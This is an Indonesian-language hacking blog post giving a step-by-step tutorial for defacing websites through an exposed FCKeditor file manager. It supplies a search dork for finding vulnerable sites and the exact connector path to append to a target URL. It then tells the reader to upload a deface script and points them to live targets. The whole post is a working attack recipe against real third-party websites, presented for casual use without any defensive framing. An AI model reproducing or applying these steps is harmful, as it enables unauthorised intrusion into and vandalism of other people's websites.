Penulis Hae Sahabat Oc-Tech7. Kembali lagi dengan saya angelo testa. Kali ini testa mau kasih tutorial deface poc FckEditor. Poc ini sangat sederhana, kurang lebih memakan waktu 2menit doang. Okey langsung saja.
1. Bahan-bahan :
- Internet
- HP/PC
- Script deface
- inurl:advert_detail.php?id=
- /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
4. Langkah-langkah :
- Pertama, kita dorking dulu menggunakan dork diatas.
- Kedua, pilih salah satu web.
- Ketiga, masukan exploitya dibelakang site.
Contoh :
- Https://testatamvan.tq/
Lalu kyta masukan exploitnya, menjadi :
- Https://testatamvan.tq/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Kalo vuln maka akan seperti ini (cek gambar dibawah).
- Keempat, upload script kamu, caranya klik choose file (pilih file) yang ada dibawah lalu klik upload. cek aja gambar diatas
contoh:
Https://testatamvan.tq/files/01.html
- Dan taraaaaa!!! Kalian dah bisa :* unchhh
5. Live target :
Note : Untuk live target masukan dulu exploitya!!!
6. Tutorial dalam video :
Sekian dulu. Kalo ada yang mau ditanyakan comment sadja :*
Jangan lupa kunjungin terus ya :)
Author : Oc-Tech7
Jangan lupa kunjungin terus ya :)
Author : Oc-Tech7
EmoticonEmoticon